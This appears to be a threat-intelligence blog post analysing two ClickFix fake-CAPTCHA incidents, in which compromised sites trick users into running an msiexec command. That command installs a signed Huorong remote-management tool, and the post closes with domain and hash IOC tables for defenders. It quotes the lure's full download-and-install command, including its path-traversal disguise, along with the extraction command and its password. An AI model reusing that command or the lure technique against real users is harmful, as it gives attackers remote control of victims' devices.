Huorong Security Management Weaponized in ClickFix Attacks
Huorong Security Management Weaponized in ClickFix Attacks
Huorong is a Beijing based security company that offers an Endpoint Security Management Systems suite for enterprise and government customers. In newly observed ClickFix attacks, the Huorong EDR product is abused as an entry point into compromised systems. The Huorong Configuration Manager is bundled into an Advanced Installer MSI and installed on victim devices, giving malicious actors complete control over the device. The installer is deployed through compromised domains serving ClickFix (FakeCAPTCHA) lures.
Incident Overview
Like most ClickFix related incidents, a legitimate domain was compromised and abused to deploy a ClickFix lure. This write up will focus on an incident identified on January 30th, 2026. This is the second incident I have observed using this Advanced Installer method.
The first incident “AICAgo” involved the American Indian Center of Arkansas domain. Both observed incidents are referred to as “Incident One” or “Incident Two”.
The Culligan Water domain was compromised by an unknown threat actor and implanted with a script serving a malicious ClickFix lure. This lure asked users to follow the standard Win+R, CTRL+V, Enter steps.
The command copied to the clipboard was an MSIExec command reaching out to a remote domain to install an MSI.
MsiExEC.exe -pAcKaGe http:\\intentcpadi.com\system32\..\VerificationID\..\466943 /q
This command uses directory traversal as part of the social engineering lure. The functional URL is intentcpadi.com/466943, the system32 and VerificationID paths are traversed via dot-dot-slash mechanisms. This adds an amount of legitimacy to the command without relying on the typical comment appending often seen in other ClickFix lures.
The remote MSI is an Advanced Installer bundled MSI. It contains typical Advanced Installer files containing the strings for the installer, the font choices, and other UI elements. The installer executable is named Binary.viewer.exe. Additionally, there is a bundled CAB file named disk1. This CAB file contains an encrypted 7zip archive and a packaged 7-Zip Reduced Standalone Console binary.
The Advanced Installer contains text stating it is a “PDF Toolkit” installer. In both observed incidents, this “PDF Toolkit” had different names, but functioned the same.
Incident 1 (AICAgo): SlatePDF Office Toolkit
Incident 2 (Culligan Water): ClearForm PDF Platform
A directory named after the “PDF Toolkit” is created in the user’s %APPDATA% directory. The encrypted 7zip Archive is decrypted and extracted to this %APPDATA% location.
/HideWindow /dir "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\" "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\upd.exe" x "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\u.7z" -p6321282026 -o"%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\" -y
Once the files have been extracted, the Advanced Installer process starts u.exe - The Huorong Configuration Manager.
/DontWait "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\\u\u.exe"
The files extracted from the archive included the Huorong Configuration Manager u.exe, as well as several custom DLLs used in the Configuration Manager. These files are signed with a valid certificate from Huorong.
Notably, the first observed incident used the Huorong Internet Security Log Viewer instead of the Huorong Configuration Manager. It is unknown why these incidents differed on this payload. The DLL files were the same for both incidents, although the Configuration Manager included more bundled DLLs.
The Huorong Endpoint Security Management System supports remote desktop access. This is configured to prompt the user to “allow” or “deny” the connection. However, if there is no response for 30 seconds, the client will automatically connect (Huorong).
Additionally, the product also supports remote connections through the remote assistance function. This function can be configured to operate silently, with no notification to the user (Huorong).
Note: Both of those pages were machine translated. There may be errors in the translation. I don’t read Chinese.
It is likely that a successful compromise would involve either hands-on-keyboard activity or automated post-compromise activity. Unfortunately, I do not have a method of testing or observing post-compromise behaviors currently.
IOCs
These are formatted terribly. It kind of works though lol
Incident One: AICAgo
Network/Lure
| Domain | Notes |
|---|---|
| aicago.org | Compromised Domain |
| dorisproperties.com | MSI Delivery |
MSI
| Name | Hash |
|---|---|
| upd5.msi | 0659F83185C20068793B4651F2BC025E8366BD78B321E94684D1C7385DB54D47 |
| Name | Hash |
|---|---|
| !_Columns | 7CD65AE2A9D01FF4BC1870BA9004331F6260B1C62BE83415F9977F987C70BFF6 |
| !_StringData | 59E4498890E237CA2720185A9E827C14666E3150AA4BE1B2566ACD30700DEC31 |
| !_StringPool | 2C4307925797A0C6D99A59769D35E1432ED63A097873BA08C34031F2C369BF96 |
| !_Tables | 3E35843FD86754C9035FB8F58A4BA014C90FA5ADA5342C71DB2125A7F3E792C8 |
| !_Validation | 8BA3E771B00BCCC06B4D5422AC8619790BE23CE37D0EB21ED45E0A588EB0E520 |
| !ActionText | 8DDF3ECE54C773BC9326D796DF007922A70BDBC96A2B79551C6D9AC14CC2FD7C |
| !AdminExecuteSequence | 727D03574EC08C7497133A9167DA8EB8F67EA6D7451DE5521051AAC108E270BC |
| !AdminUISequence | 3A2BC99F2BC94C7D48F36B4949F6B4EFE5EAF7624ADBA4B77CD6BBDBC58DEBAE |
| !AdvtExecuteSequence | F858747A92E6DF6939C270EDA54D6D6EA9BF5DA3952E8C57D3CED96754AA72EB |
| !Binary | 2EA7D81194F0013056C4777A3C0C5768D829531CA95323BB050E7BEF3B9F2685 |
| !BootstrapperUISequence | 247A75BE20F77A500E95C9A204E3F8BCAFC522EECAF45F58744C789B2144E7B8 |
| !CheckBox | 00F5047F7D2C46B101138D309ECAF74EDB5E5735B18FDF78AB34A91A8D4C445F |
| !Component | 1133E479A0FAE2188174B2EB4C0A046C532F13CDF034613968573D13AFDB460F |
| !Control | 458E4CBBDDA525AC0B2E689C7D1FFD52119D0895FD999073A2FCE3921328207E |
| !ControlCondition | A0C386C95C7DB1B8FA87489FA5BC23328744794F3D96D83FF4DA9EEB84AAE6BF |
| !ControlEvent | 7CDB452680805066EB401563225951D3AC7BD10C78C8EF2AADECED5E988E9F7D |
| !CreateFolder | BCCCAE1D91009180F4B87F7F3551EC2C13D40CBE01BABCC0B037CD9BA36ED01D |
| !CustomAction | F51D8D043D48F42CDD1D8A54943ADD5F0F5CAE248A134BD6B1AFA15CF1C246C8 |
| !Dialog | 94097893A253762F516D11DEDE79096E2878E42BFB936556748E3F761AA37C1B |
| !Directory | 529DBEE29197AED62D0D9062FAA0E90B262D378763C0051625486C0FAEC235F5 |
| !Error | DF0FC37D473C3779ADE1D93372E5A79B0EF30C2BC951B93FB5E50E4494B31A56 |
| !EventMapping | 5A0BE97B0D267E1D87D9CFF667E8ABE9FE3A6F8E515179DE42AD643C99D7CD11 |
| !Feature | 1FDF708D5FAC4A31A6C5487577A277DFE02048D130EA7DE3EA365162E9BBB38D |
| !FeatureComponents | 107DFED7F98B11A0E5DBB6B884A6D8E5A7D1791FE518BC901084CD765B46002E |
| !File | FFD2AB9A5ACEF3B2A9B9A1FE5F0813CC2F86CD9FFDD6F9D356608728D119A72F |
| !InstallExecuteSequence | 4748AA1A659BC0AB887F8725D5FCA36229F87BA08E23E3B85AB36711C3211523 |
| !InstallUISequence | E8A21DE0C29ADC474318C3005F8D11FABF0304FAB2182BF9E9725201A2F03EB9 |
| !LaunchCondition | A0AB0EB933C1BA1D06DFA3202BB7963A770FF0F1E68A14C58CE4BB19BC08D51E |
| !Media | 669CC3BC9DF86F4DF11A1456A97934C1CBC0063583AF8A2EC318AA07AB4E3435 |
| !Property | 4B447584637335CD69038BE3D7AEE705447F09F777CD8623966ADC46C2C335ED |
| !RadioButton | 835A19C417ECC834DB58F506BFB386C4FFDA1BBD9BB91F00510CCC8CF0F2EE75 |
| !Registry | C4267E281A6AFADA0ECD07A20957ECD69170E76F74F60B1DF5650618C83C5AD5 |
| !TextStyle | D07C544D19E0BAA1E19378AAE8D06EE64AC8D83930A03CF1C6EE93D92D8A9A41 |
| !UIText | B39F86E1ED9065C132484F66EE1CF299691715D67F72BB6A1469DE73F3137EEA |
| !Upgrade | 4EAF016B83242D47AB9736B8CC7D123A1EB90E6937E1932D3B2E9AADBCF74A7E |
| [5]SummaryInformation | |
| Binary.banner.scale125.jpg | 3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21 |
| Binary.banner.scale150.jpg | 0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1 |
| Binary.banner.scale200.jpg | 033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA |
| Binary.banner.svg | 865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0 |
| Binary.dialog.scale125.jpg | 557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7 |
| Binary.dialog.scale150.jpg | B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4 |
| Binary.dialog.scale200.jpg | F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD |
| Binary.dialog.svg | 135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C |
| Binary.viewer.exe | 9600A99A4B058AFF17C30EB551DC21FA6E0C83EC787FA007F0C7F0752471804D |
| disk1.cab | B55E3591A351D195D7749EB16D541D8277A3D639B6687FDEE98BC463CFE20B7D |
Extracted Huorong Files
| Name | Hash |
|---|---|
| DuiLib.dll | AB898EB40C12C14363061D687BFCCC3A82E362D799EACFAEA96B57D78D7D0A2D |
| HipsDB.dll | BE3BFCADBE526E95C986C9F068E1469DCE171388A3D36E66D4FA97CDFDAC1F35 |
| jansson.dll | 5AB560BA25605087F7A449527AD5B7A3686E1F9FCA1ABB0A1A7612F57CD89DF2 |
| libxsse.dll | 8B4D95270FBD44385DC5A6CD96410479E0BD2A9280FE618931DE9EB9DA4841F0 |
| selfprot.dll | C780269D3053D1CC34518D0112700FBA34BA6EE65C3D50683DCF77A946F7DA4A |
| sqlite.dll | F323C011BAE2A141AD31E9D494028FD9B201E1F976B2C4D48CA82790C5D7D9D4 |
| uactmon.dll | B548468B39EDF0DABD6A122ECDA4E19F6B99D256D8A331ED32E8B02D21A6522B |
| upd.exe | B4812F8AD93EF283CB67E896D31528871563D92B1309BFB976DCB1C855F47FCF |
| usysdiag.dll | 605C25BAB889274F2ACAEDCE496862CFCBA26102F24CE19FF86BF0CEA4F3D5AE |
Incident Two: Culligan Water
Network
| Domain | Notes |
|---|---|
| culliganwater.com | Compromised Domain |
| intentcpadi.com | MSI Delivery |
MSI
| Name | Hash |
|---|---|
| CoreCCN.msi | CF6E316E5B3D011A87FCF1F0F7B0AB8CF5AD98551E1DB3E5AC3362287A39922B |
| Name | Hash |
|---|---|
| !_Columns | 7CD65AE2A9D01FF4BC1870BA9004331F6260B1C62BE83415F9977F987C70BFF6 |
| !_StringData | E470E99619001FCD4BF2D3B440D5774F75B718799A671C33EB355EE797EAB7DC |
| !_StringPool | 494C56313FDF16A79EB9472F109AFF6282E66721772CEFAF957E45D321F320D0 |
| !_Tables | 3E35843FD86754C9035FB8F58A4BA014C90FA5ADA5342C71DB2125A7F3E792C8 |
| !_Validation | 8BA3E771B00BCCC06B4D5422AC8619790BE23CE37D0EB21ED45E0A588EB0E520 |
| !ActionText | 8DDF3ECE54C773BC9326D796DF007922A70BDBC96A2B79551C6D9AC14CC2FD7C |
| !AdminExecuteSequence | 727D03574EC08C7497133A9167DA8EB8F67EA6D7451DE5521051AAC108E270BC |
| !AdminUISequence | 3A2BC99F2BC94C7D48F36B4949F6B4EFE5EAF7624ADBA4B77CD6BBDBC58DEBAE |
| !AdvtExecuteSequence | F858747A92E6DF6939C270EDA54D6D6EA9BF5DA3952E8C57D3CED96754AA72EB |
| !Binary | 2EA7D81194F0013056C4777A3C0C5768D829531CA95323BB050E7BEF3B9F2685 |
| !BootstrapperUISequence | 247A75BE20F77A500E95C9A204E3F8BCAFC522EECAF45F58744C789B2144E7B8 |
| !CheckBox | 00F5047F7D2C46B101138D309ECAF74EDB5E5735B18FDF78AB34A91A8D4C445F |
| !Component | 1133E479A0FAE2188174B2EB4C0A046C532F13CDF034613968573D13AFDB460F |
| !Control | 458E4CBBDDA525AC0B2E689C7D1FFD52119D0895FD999073A2FCE3921328207E |
| !ControlCondition | A0C386C95C7DB1B8FA87489FA5BC23328744794F3D96D83FF4DA9EEB84AAE6BF |
| !ControlEvent | 7CDB452680805066EB401563225951D3AC7BD10C78C8EF2AADECED5E988E9F7D |
| !CreateFolder | BCCCAE1D91009180F4B87F7F3551EC2C13D40CBE01BABCC0B037CD9BA36ED01D |
| !CustomAction | F51D8D043D48F42CDD1D8A54943ADD5F0F5CAE248A134BD6B1AFA15CF1C246C8 |
| !Dialog | 94097893A253762F516D11DEDE79096E2878E42BFB936556748E3F761AA37C1B |
| !Directory | 529DBEE29197AED62D0D9062FAA0E90B262D378763C0051625486C0FAEC235F5 |
| !Error | DF0FC37D473C3779ADE1D93372E5A79B0EF30C2BC951B93FB5E50E4494B31A56 |
| !EventMapping | 5A0BE97B0D267E1D87D9CFF667E8ABE9FE3A6F8E515179DE42AD643C99D7CD11 |
| !Feature | 1FDF708D5FAC4A31A6C5487577A277DFE02048D130EA7DE3EA365162E9BBB38D |
| !FeatureComponents | 107DFED7F98B11A0E5DBB6B884A6D8E5A7D1791FE518BC901084CD765B46002E |
| !File | E09BC30AC00D3D05EAA0F730B4E277821453D2744EB5992BE365A2B6965A3BD8 |
| !InstallExecuteSequence | 4748AA1A659BC0AB887F8725D5FCA36229F87BA08E23E3B85AB36711C3211523 |
| !InstallUISequence | E8A21DE0C29ADC474318C3005F8D11FABF0304FAB2182BF9E9725201A2F03EB9 |
| !LaunchCondition | A0AB0EB933C1BA1D06DFA3202BB7963A770FF0F1E68A14C58CE4BB19BC08D51E |
| !Media | 669CC3BC9DF86F4DF11A1456A97934C1CBC0063583AF8A2EC318AA07AB4E3435 |
| !Property | 4B447584637335CD69038BE3D7AEE705447F09F777CD8623966ADC46C2C335ED |
| !RadioButton | 835A19C417ECC834DB58F506BFB386C4FFDA1BBD9BB91F00510CCC8CF0F2EE75 |
| !Registry | C4267E281A6AFADA0ECD07A20957ECD69170E76F74F60B1DF5650618C83C5AD5 |
| !TextStyle | D07C544D19E0BAA1E19378AAE8D06EE64AC8D83930A03CF1C6EE93D92D8A9A41 |
| !UIText | B39F86E1ED9065C132484F66EE1CF299691715D67F72BB6A1469DE73F3137EEA |
| !Upgrade | 4EAF016B83242D47AB9736B8CC7D123A1EB90E6937E1932D3B2E9AADBCF74A7E |
| [5]SummaryInformation | |
| Binary.banner.scale125.jpg | 3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21 |
| Binary.banner.scale150.jpg | 0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1 |
| Binary.banner.scale200.jpg | 033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA |
| Binary.banner.svg | 865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0 |
| Binary.dialog.scale125.jpg | 557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7 |
| Binary.dialog.scale150.jpg | B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4 |
| Binary.dialog.scale200.jpg | F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD |
| Binary.dialog.svg | 135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C |
| Binary.viewer.exe | 9600A99A4B058AFF17C30EB551DC21FA6E0C83EC787FA007F0C7F0752471804D |
| disk1.cab | BBA0A09D19845CEA9DDE8CDBC13FB2B3FC5052E6C375E846F24B52C802B9ECEF |
Extracted Huorong Files
| Name | Hash |
|---|---|
| DuiLib.dll | AB898EB40C12C14363061D687BFCCC3A82E362D799EACFAEA96B57D78D7D0A2D |
| HipsDB.dll | BE3BFCADBE526E95C986C9F068E1469DCE171388A3D36E66D4FA97CDFDAC1F35 |
| hrcomm.dll | DF6D896B0E51AC173810E6804605B6695E262A36322C9BEF2C004BD4B29B314E |
| jansson.dll | 5AB560BA25605087F7A449527AD5B7A3686E1F9FCA1ABB0A1A7612F57CD89DF2 |
| libcurl.dll | B1C446F737044A8C82DAD6456603ACD285F68693E6B92E73D6CE3F65CA9FEFE6 |
| libxsse.dll | 8B4D95270FBD44385DC5A6CD96410479E0BD2A9280FE618931DE9EB9DA4841F0 |
| logger.dll | 265A8DDA15610BB468FE14B144BE3E6179BF1AEB185D590D59C3E7B76F8982C2 |
| selfprot.dll | 4BF036040348222FA616B20D83E1E9F566389C453614F23CBB4D03A5DC441237 |
| sqlite.dll | F323C011BAE2A141AD31E9D494028FD9B201E1F976B2C4D48CA82790C5D7D9D4 |
| u.exe | 05D2B96B2923B447A9A7C9A3BC73EDF2C0BB48654726E33FAC988BF0CAE446BE |
| uactmon.dll | B548468B39EDF0DABD6A122ECDA4E19F6B99D256D8A331ED32E8B02D21A6522B |
| upgrade.dll | C2FEBAE3E5929289D4633161DD007FC1B75993CBD1AB98AC12EA6F062A61EBF7 |
| usysdiag.dll | 605C25BAB889274F2ACAEDCE496862CFCBA26102F24CE19FF86BF0CEA4F3D5AE |